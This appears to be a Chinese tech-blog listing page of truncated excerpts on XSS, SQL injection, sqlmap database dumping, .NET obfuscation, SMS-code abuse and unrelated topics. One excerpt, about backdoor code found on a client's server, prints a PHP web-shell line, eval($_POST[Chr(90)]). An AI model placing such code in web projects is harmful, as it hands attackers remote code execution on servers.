一、背景 在Web安全中,xss攻击绝对算是一种非常常见的攻击方式了,它能够窃取用户的隐私信息,比如cookie,也能够做一些非用户意图的操作来达到攻击目的。 二、原理 xss攻击是一种非法脚本的插入与执行攻击,全称为 cross site script ,即跨站脚本攻击。 通常我们访问一个安全的网 ...
分类:
其他好文 时间:
2020-07-26 15:56:23
阅读次数:
73
C# 编写的代码通过VS编译器生成 dll 或 exe ,很容易被一些反编译工具查看到源码或对源码进行修改。为防止代码被反编译或被篡改,我们可以进行一定的防范措施。但不能杜绝,因为DotNet编写代码运行必须编译成IL 中间语言,IL是很规则,同时也很好反编译。 反编译防范措施: 设置项目代码反汇编 ...
短信接口验证码是网站,App,微信端校验用户手机号码真实性的首要途径,在为用户提供便利的同时,手机短信验证功能也会被部分用户进行恶意使用。恶意频繁发送短信验证码,不仅会增加公司的运营成本,增加系统负载,也会给公司的形象造成极坏的影响(一般短信都会带公司的签名),所以必须要对这种行为进行防范,那么如何 ...
分类:
其他好文 时间:
2020-07-16 11:44:54
阅读次数:
83
今天把客户查找后门的时候发现的代码,特分享下,看到这样的代码就是黑客用来攻击别人访问,不断访问指定网站,导致网站无法访问,我们的网站就是帮凶了,同时我们自己的网站或服务器也会无法访问,所以一定要注意防范。 cc攻击代码,支持udp <?php eval($_POST[Chr(90)]); set_t ...
分类:
Web程序 时间:
2020-07-14 16:30:35
阅读次数:
75
4.8 sqlmap数据库拖库攻击与防范 4.8.1 sqlmap数据库拖库攻击简介 1.拖库简介 原因是由于早年间多家媒体报道多家互联网网站数据库被公开下载,后制作社工库,用来查询公开的个人信息所致 2. 拖库步骤 (1) 发现的各种Web安全漏洞并利用漏洞 (2) 获取webshell及服务器权 ...
分类:
数据库 时间:
2020-07-04 22:49:54
阅读次数:
218
JAVA线程虚假唤醒 线程虚假唤醒问题描述 ? 在JDK API文档中,关于Object类的wait()方法有这样一句话描述"线程也可以唤醒,而不会被通知,中断或超时,即所谓的虚假唤醒 。 虽然这在实践中很少会发生,但应用程序必须通过测试应该使线程被唤醒的条件来防范,并且如果条件不满足则继续等待", ...
分类:
编程语言 时间:
2020-07-04 22:26:00
阅读次数:
66
概述 数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就 ...
分类:
数据库 时间:
2020-07-04 15:18:30
阅读次数:
112
传统的证券交易系统结构复杂、环节繁多、投入大、效率低且差错率较高,其原因在于证券行业发展初期,受限于当时的通讯技术和计算机处理技术不发达. 几十年后的今天,计算机处理技术、通讯技术已经得到飞跃式的发展,同时也伴随着互联网的广泛应用,使基于互联网技术下,将传统的交易撮合系统、登记结算系统、代理买卖系统 ...
分类:
其他好文 时间:
2020-07-03 10:47:25
阅读次数:
77
《关于全面推进“智慧消防”建设的指导意见》发布至今,全国刮起了基本建设智慧消防的风潮。重点建设的“五大新项目”历经近一年的实践活动,具体的解决方法早已日趋完善,基本完成了动态性感知、智能化判断、精确防治,为消防工作和军队基本建设出示了信息化管理支撑。1、城市物联网消防实时监控系统城市物联网消防实时监控系统,便是开发利用RFID(射频识别技术)、无线网络传感技术、云计算技术、大数据等技术,借助有线、
分类:
其他好文 时间:
2020-06-28 19:02:57
阅读次数:
129
DotfuscatorPro_4.9可以防止你的.NET软件被反编译,可以在一定程度上防止你的软件被反编译。现在很多软件都有被反编译的现象,虽然不能做到百分百的防范,但是你至少可以先做些技术上的处理,至少能挡住许多小白。 打开DotfuscatorPro软件,如图所示,点击ok 点击这个文件夹图标, ...
分类:
其他好文 时间:
2020-06-26 14:28:29
阅读次数:
95
